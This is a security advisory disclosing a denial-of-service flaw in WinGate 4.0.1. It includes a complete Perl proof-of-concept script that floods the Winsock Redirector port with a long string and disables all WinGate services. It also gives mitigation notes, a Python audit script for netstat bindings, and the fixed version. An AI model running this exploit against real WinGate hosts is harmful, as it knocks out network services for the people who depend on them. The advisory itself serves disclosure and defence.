COMMAND

    WinGate

SYSTEMS AFFECTED

    Wingate 4.0.1

PROBLEM

    Blue Panda found the following. The Wingate engine can be disabled
    by sending an abnormal string to the Winsock Redirector Service.
    The attack is not logged.

    Proof of concept:

    #!/usr/bin/perl
    #
    # wgate401.pl - Wingate 4.0.1 denial-of-service
    # Blue Panda - bluepanda@dwarf.box.sk
    # http://bluepanda.box.sk/
    #
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    # Causes all Wingate services to become unavailable until the Wingate Engine
    # is restarted. The Winsock Redirector Service must be enabled in order for
    # this to work. Tested on the evaluation version of Wingate Pro 4.0.1.
    #
    
    use IO::Socket;
    
    $host = "host.com";
    $port = "2080";
    $sleepfor = 1;
    
    print "Wingate 4.0.1 denial-of-service
    Blue Panda - bluepanda\@dwarf.box.sk
    http://bluepanda.box.sk/
    
    ----------------------------------------------------------
    Disclaimer: this file is intended as proof of concept, and
    is not intended to be used for illegal purposes. I accept
    no responsibility for damage incurred by the use of it.
    ----------------------------------------------------------
    
    Causes all Wingate services to become unavailable until the Wingate Engine
    is restarted. The Winsock Redirector Service must be enabled in order for
    this to work.\n\n";
    
    # Connect to the Winsock Redirector Service.
    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
    print "done.\n";
    
    # Send some characters to the Winsock Redirector Service.
    $buffer = "a" x 1079;
    print $socket "$buffer";
    
    # Wait a few seconds.
    $counter = 0;
    print "Sleeping for $sleepfor seconds.";
    while($counter < $sleepfor) {
            sleep(1);
            print ".";
            $counter += 1;
    }
    print "\n";
    
    # Close the connection. The Winsock Redirector Service should now be
    # disabled.
    close($socket);
    
    # Connect once more to the Winsock Redirector Service. This will disable all
    # other services.
    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
    print "done.\n";
    
    # Finished.
    close($socket);

    For normal use it is not too serious a vulnerability, as the
    Winsock Redirector Service is by default only bound to the local
    network adaptors and there is no point in binding it to public
    (internet) adaptors, meaning that the attack would have to be
    launched from within the LAN. GateKeeper will warn the operator
    when they bind the Winsock Redirector Service to a public adaptor.

    Of course this could only be performed inside a Wingate system
    (unless the operator bound the Winsock Redirector to the external
    IP address, which is a no-no).
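
    Since the exposure depends on which adaptors the Winsock Redirector
    Service is bound to, the binding can be audited from `netstat -an`
    output on the WinGate host. The following is an added example, not
    part of the original advisory or of WinGate; it assumes the port
    2080 used by the proof of concept, and the netstat sample is
    constructed.

```python
import ipaddress

REDIRECTOR_PORT = 2080  # port the proof of concept connects to (assumed default)

# Address ranges treated as "local adaptor" bindings (loopback, RFC 1918, link-local).
LAN_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]

# Constructed sample of Windows `netstat -an` output (not taken from the advisory).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.0.1:2080       0.0.0.0:0              LISTENING
  TCP    203.0.113.7:2080       0.0.0.0:0              LISTENING
  TCP    192.168.0.1:2080       192.168.0.23:1042      ESTABLISHED
  TCP    127.0.0.1:8010         0.0.0.0:0              LISTENING
"""

def classify(addr):
    """Return 'wildcard', 'local' or 'public' for a listening address."""
    ip = ipaddress.ip_address(addr)
    if ip.is_unspecified:
        return "wildcard"  # bound to every adaptor, public ones included
    return "local" if any(ip in net for net in LAN_NETS) else "public"

def audit_listeners(netstat_text, port=REDIRECTOR_PORT):
    """Return [(address, classification)] for TCP sockets listening on `port`."""
    findings = []
    for line in netstat_text.splitlines():
        f = line.split()
        # Only listening TCP sockets matter; established sessions are skipped.
        if len(f) < 4 or f[0].upper() != "TCP" or f[3].upper() != "LISTENING":
            continue
        host, _, local_port = f[1].rpartition(":")
        if not local_port.isdigit() or int(local_port) != port:
            continue
        try:
            findings.append((host, classify(host)))
        except ValueError:
            findings.append((host, "unparsed"))  # flag for manual review
    return findings

def exposed(findings):
    """Bindings reachable from outside the LAN: anything not classified 'local'."""
    return [f for f in findings if f[1] != "local"]

if __name__ == "__main__":
    for addr, kind in audit_listeners(SAMPLE_NETSTAT):
        print(f"{addr}:{REDIRECTOR_PORT} -> {kind}")
```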

SOLUTION

    Immune: Wingate 4.1 Beta A